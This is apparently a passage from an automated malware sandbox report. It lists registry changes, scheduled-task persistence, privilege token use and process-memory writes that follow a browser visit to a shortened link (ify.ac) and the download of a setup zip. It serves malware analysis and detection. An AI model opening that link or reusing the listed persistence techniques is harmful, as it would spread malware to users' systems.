powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d0a76a3e-0000-0000-0000-d01200000000}\NukeOnDelete = "0" eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eclbdtf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Modifies registry class 9 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe -
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\setup_mp6kEAYHxE.zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4820 schtasks.exe 2596 schtasks.exe 5308 schtasks.exe 2968 schtasks.exe 452 schtasks.exe 5692 schtasks.exe 3092 schtasks.exe 224 schtasks.exe 4448 schtasks.exe 2848 schtasks.exe 5236 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exesetup_mp6kEAYHxE.tmpdjminoradequate.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exe1nudJF05xlZjfK8yyP.exepowershell.exemsedge.exepowershell.exepowershell.exepowershell.EXEeclbdtf.exepid process 752 msedge.exe 752 msedge.exe 4272 msedge.exe 4272 msedge.exe 2164 msedge.exe 2164 msedge.exe 3580 identity_helper.exe 3580 identity_helper.exe 4716 msedge.exe 4716 msedge.exe 4584 msedge.exe 4584 msedge.exe 2664 setup_mp6kEAYHxE.tmp 2664 setup_mp6kEAYHxE.tmp 2768 djminoradequate.exe 2768 djminoradequate.exe 2768 djminoradequate.exe 2768 djminoradequate.exe 1516 msedge.exe 2164 powershell.exe 2164 powershell.exe 1856 powershell.exe 1856 powershell.exe 2164 powershell.exe 1856 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 5372 powershell.exe 5372 powershell.exe 5372 powershell.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5564 1nudJF05xlZjfK8yyP.exe 5736 powershell.exe 5736 powershell.exe 5736 powershell.exe 1420 msedge.exe 1420 msedge.exe 1420 msedge.exe 1420 msedge.exe 2768 djminoradequate.exe 2768 djminoradequate.exe 2768 djminoradequate.exe 2768 djminoradequate.exe 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 5524 powershell.EXE 5524 powershell.EXE 5524 powershell.EXE 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe 784 eclbdtf.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
Processes:
msedge.exemsedge.exepid process 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 4748 powershell.exe Token: SeDebugPrivilege 5372 powershell.exe Token: SeDebugPrivilege 5736 powershell.exe Token: SeIncreaseQuotaPrivilege 5836 WMIC.exe Token: SeSecurityPrivilege 5836 WMIC.exe Token: SeTakeOwnershipPrivilege 5836 WMIC.exe Token: SeLoadDriverPrivilege 5836 WMIC.exe Token: SeSystemProfilePrivilege 5836 WMIC.exe Token: SeSystemtimePrivilege 5836 WMIC.exe Token: SeProfSingleProcessPrivilege 5836 WMIC.exe Token: SeIncBasePriorityPrivilege 5836 WMIC.exe Token: SeCreatePagefilePrivilege 5836 WMIC.exe Token: SeBackupPrivilege 5836 WMIC.exe Token: SeRestorePrivilege 5836 WMIC.exe Token: SeShutdownPrivilege 5836 WMIC.exe Token: SeDebugPrivilege 5836 WMIC.exe Token: SeSystemEnvironmentPrivilege 5836 WMIC.exe Token: SeRemoteShutdownPrivilege 5836 WMIC.exe Token: SeUndockPrivilege 5836 WMIC.exe Token: SeManageVolumePrivilege 5836 WMIC.exe Token: 33 5836 WMIC.exe Token: 34 5836 WMIC.exe Token: 35 5836 WMIC.exe Token: 36 5836 WMIC.exe Token: SeIncreaseQuotaPrivilege 5836 WMIC.exe Token: SeSecurityPrivilege 5836 WMIC.exe Token: SeTakeOwnershipPrivilege 5836 WMIC.exe Token: SeLoadDriverPrivilege 5836 WMIC.exe Token: SeSystemProfilePrivilege 5836 WMIC.exe Token: SeSystemtimePrivilege 5836 WMIC.exe Token: SeProfSingleProcessPrivilege 5836 WMIC.exe Token: SeIncBasePriorityPrivilege 5836 WMIC.exe Token: SeCreatePagefilePrivilege 5836 WMIC.exe Token: SeBackupPrivilege 5836 WMIC.exe Token: SeRestorePrivilege 5836 WMIC.exe Token: SeShutdownPrivilege 5836 WMIC.exe Token: SeDebugPrivilege 5836 WMIC.exe Token: SeSystemEnvironmentPrivilege 5836 WMIC.exe Token: SeRemoteShutdownPrivilege 5836 WMIC.exe Token: SeUndockPrivilege 5836 WMIC.exe Token: SeManageVolumePrivilege 5836 WMIC.exe Token: 33 5836 WMIC.exe Token: 34 5836 WMIC.exe Token: 35 5836 WMIC.exe Token: 36 5836 WMIC.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 5524 powershell.EXE Token: SeDebugPrivilege 5664 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2160 WMIC.exe Token: SeIncreaseQuotaPrivilege 2160 WMIC.exe Token: SeSecurityPrivilege 2160 WMIC.exe Token: SeTakeOwnershipPrivilege 2160 WMIC.exe Token: SeLoadDriverPrivilege 2160 WMIC.exe Token: SeSystemtimePrivilege 2160 WMIC.exe Token: SeBackupPrivilege 2160 WMIC.exe Token: SeRestorePrivilege 2160 WMIC.exe Token: SeShutdownPrivilege 2160 WMIC.exe Token: SeSystemEnvironmentPrivilege 2160 WMIC.exe Token: SeUndockPrivilege 2160 WMIC.exe Token: SeManageVolumePrivilege 2160 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2160 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exesetup_mp6kEAYHxE.tmpAxnTxNXsNH.tmpmsedge.exepid process 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 2664 setup_mp6kEAYHxE.tmp 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 2020 AxnTxNXsNH.tmp 572 msedge.exe -
Suspicious use of SendNotifyMessage 34 IoCs
Processes:
msedge.exemsedge.exepid process 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 4272 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe 572 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4272 wrote to memory of 1556 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 1556 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 2532 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 752 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 752 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe PID 4272 wrote to memory of 568 4272 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff81e303cb8,0x7ff81e303cc8,0x7ff81e303cd82⤵PID:1556
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:2532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:752 -
